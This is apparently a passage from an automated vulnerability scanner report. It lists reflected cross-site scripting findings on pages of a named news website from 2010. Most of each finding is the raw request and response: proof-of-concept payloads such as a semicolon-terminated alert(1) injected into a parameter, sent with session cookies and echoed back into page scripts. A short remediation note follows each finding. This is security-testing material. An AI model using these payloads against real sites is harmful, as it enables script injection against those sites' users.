User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29413
Vary: Accept-Encoding
Cache-Control: max-age=226
Expires: Sun, 21 Nov 2010 23:12:23 GMT
Date: Sun, 21 Nov 2010 23:08:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gamingbdcfc"><a>0a261e4d294 ss_virtualworlds">
...[SNIP]...

1.154. http://www.wired.com/gaming/virtualworlds [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/virtualworlds

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97bbd"><a>49da4046a0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gaming/virtualworlds97bbd"><a>49da4046a0e HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29413
Vary: Accept-Encoding
Cache-Control: max-age=575
Expires: Sun, 21 Nov 2010 23:18:45 GMT
Date: Sun, 21 Nov 2010 23:09:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gaming ss_virtualworlds97bbd"><a>49da4046a0e">
...[SNIP]...

1.155. http://www.wired.com/inspiredbyyou/2010/07/electric-car-grid/ [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/07/electric-car-grid/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 96627%3balert(1)//343adadbdb2 was appended to the parameter's original value (5) and submitted in the ibypid parameter, which is why the request below carries ibypid=596627%3balert(1)//343adadbdb2. This input was echoed as 596627;alert(1)//343adadbdb2 in the application's response: the %3b decodes to a semicolon that terminates the numeric assignment, alert(1) then runs as a fresh statement, and // comments out the trailing marker and the template's own semicolon.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/07/electric-car-grid/?ibypid=596627%3balert(1)//343adadbdb2 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:33 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=445
Expires: Sun, 21 Nov 2010 23:21:58 GMT
Date: Sun, 21 Nov 2010 23:14:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 596627;alert(1)//343adadbdb2;</script>
...[SNIP]...

1.156. http://www.wired.com/inspiredbyyou/2010/07/events-calendar [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/07/events-calendar

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31876%3balert(1)//b8b3883cd7f was submitted in the ibypid parameter. This input was echoed as 31876;alert(1)//b8b3883cd7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/07/events-calendar?ibypid=231876%3balert(1)//b8b3883cd7f HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:13 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:13 GMT
Date: Sun, 21 Nov 2010 23:14:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 231876;alert(1)//b8b3883cd7f;</script>
...[SNIP]...

1.157. http://www.wired.com/inspiredbyyou/2010/07/must-sees/ [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/07/must-sees/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 53f8c%3balert(1)//63f97596e7a was submitted in the ibypid parameter. This input was echoed as 53f8c;alert(1)//63f97596e7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/07/must-sees/?ibypid=453f8c%3balert(1)//63f97596e7a HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:18 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:18 GMT
Date: Sun, 21 Nov 2010 23:14:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 103981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 453f8c;alert(1)//63f97596e7a;</script>
...[SNIP]...

1.158. http://www.wired.com/inspiredbyyou/2010/07/the-list [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/07/the-list

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 985e3%3balert(1)//29173f1a6e4 was submitted in the ibypid parameter. This input was echoed as 985e3;alert(1)//29173f1a6e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/07/the-list?ibypid=3985e3%3balert(1)//29173f1a6e4 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:17 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:17 GMT
Date: Sun, 21 Nov 2010 23:14:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 104027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 3985e3;alert(1)//29173f1a6e4;</script>
...[SNIP]...

1.159. http://www.wired.com/inspiredbyyou/2010/07/tweetcarts [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/07/tweetcarts

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9281f%3balert(1)//1442148a2f4 was submitted in the ibypid parameter. This input was echoed as 9281f;alert(1)//1442148a2f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/07/tweetcarts?ibypid=19281f%3balert(1)//1442148a2f4 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:09 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=447
Expires: Sun, 21 Nov 2010 23:21:37 GMT
Date: Sun, 21 Nov 2010 23:14:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 102331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 19281f;alert(1)//1442148a2f4;</script>
...[SNIP]...

1.160. http://www.wired.com/inspiredbyyou/2010/08/english-japanese-emoticon-translator/ [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/08/english-japanese-emoticon-translator/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a7a08%3balert(1)//72fe6adb542 was submitted in the ibypid parameter. This input was echoed as a7a08;alert(1)//72fe6adb542 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/08/english-japanese-emoticon-translator/?ibypid=6a7a08%3balert(1)//72fe6adb542 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:28 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=446
Expires: Sun, 21 Nov 2010 23:21:55 GMT
Date: Sun, 21 Nov 2010 23:14:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 6a7a08;alert(1)//72fe6adb542;</script>
...[SNIP]...

1.161. http://www.wired.com/inspiredbyyou/2010/08/top-ten-most-popular-celebrities/ [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/08/top-ten-most-popular-celebrities/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 67c96%3balert(1)//9c87be7eadf was submitted in the ibypid parameter. This input was echoed as 67c96;alert(1)//9c87be7eadf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/08/top-ten-most-popular-celebrities/?ibypid=767c96%3balert(1)//9c87be7eadf HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:24 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:24 GMT
Date: Sun, 21 Nov 2010 23:14:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 767c96;alert(1)//9c87be7eadf;</script>
...[SNIP]...

1.162. http://www.wired.com/inspiredbyyou/2010/09/ascent-of-robot/ [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/09/ascent-of-robot/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f56c8%3balert(1)//bb7f19b9979 was submitted in the ibypid parameter. This input was echoed as f56c8;alert(1)//bb7f19b9979 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/09/ascent-of-robot/?ibypid=9f56c8%3balert(1)//bb7f19b9979 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:39 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:39 GMT
Date: Sun, 21 Nov 2010 23:14:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 105063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 9f56c8;alert(1)//bb7f19b9979;</script>
...[SNIP]...

1.163. http://www.wired.com/inspiredbyyou/2010/09/bittorrent-or-box-office/ [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/09/bittorrent-or-box-office/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c43e3%3balert(1)//d95607fec28 was submitted in the ibypid parameter. This input was echoed as c43e3;alert(1)//d95607fec28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/09/bittorrent-or-box-office/?ibypid=11c43e3%3balert(1)//d95607fec28 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:35 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=449
Expires: Sun, 21 Nov 2010 23:22:04 GMT
Date: Sun, 21 Nov 2010 23:14:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 11c43e3;alert(1)//d95607fec28;</script>
...[SNIP]...

1.164. http://www.wired.com/inspiredbyyou/2010/09/re-animators/ [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/09/re-animators/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1b488%3balert(1)//92eb5cb2444 was submitted in the ibypid parameter. This input was echoed as 1b488;alert(1)//92eb5cb2444 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/09/re-animators/?ibypid=101b488%3balert(1)//92eb5cb2444 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:39 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=467
Expires: Sun, 21 Nov 2010 23:22:26 GMT
Date: Sun, 21 Nov 2010 23:14:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 101b488;alert(1)//92eb5cb2444;</script>
...[SNIP]...

1.165. http://www.wired.com/inspiredbyyou/2010/09/the-molecular-pantry/ [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/09/the-molecular-pantry/

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8030b%3balert(1)//54f8fbfd62 was submitted in the ibypid parameter. This input was echoed as 8030b;alert(1)//54f8fbfd62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/09/the-molecular-pantry/?ibypid=88030b%3balert(1)//54f8fbfd62 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:35 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:35 GMT
Date: Sun, 21 Nov 2010 23:14:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 104883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 88030b;alert(1)//54f8fbfd62;</script>
...[SNIP]...

1.166. http://www.wired.com/inspiredbyyou/2010/10/buy-it-or-burn-it [ibypid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /inspiredbyyou/2010/10/buy-it-or-burn-it

Issue detail

The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dc247%3balert(1)//401a89ca126 was submitted in the ibypid parameter. This input was echoed as dc247;alert(1)//401a89ca126 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inspiredbyyou/2010/10/buy-it-or-burn-it?ibypid=12dc247%3balert(1)//401a89ca126 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:13:45 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=438
Expires: Sun, 21 Nov 2010 23:21:03 GMT
Date: Sun, 21 Nov 2010 23:13:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 105655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
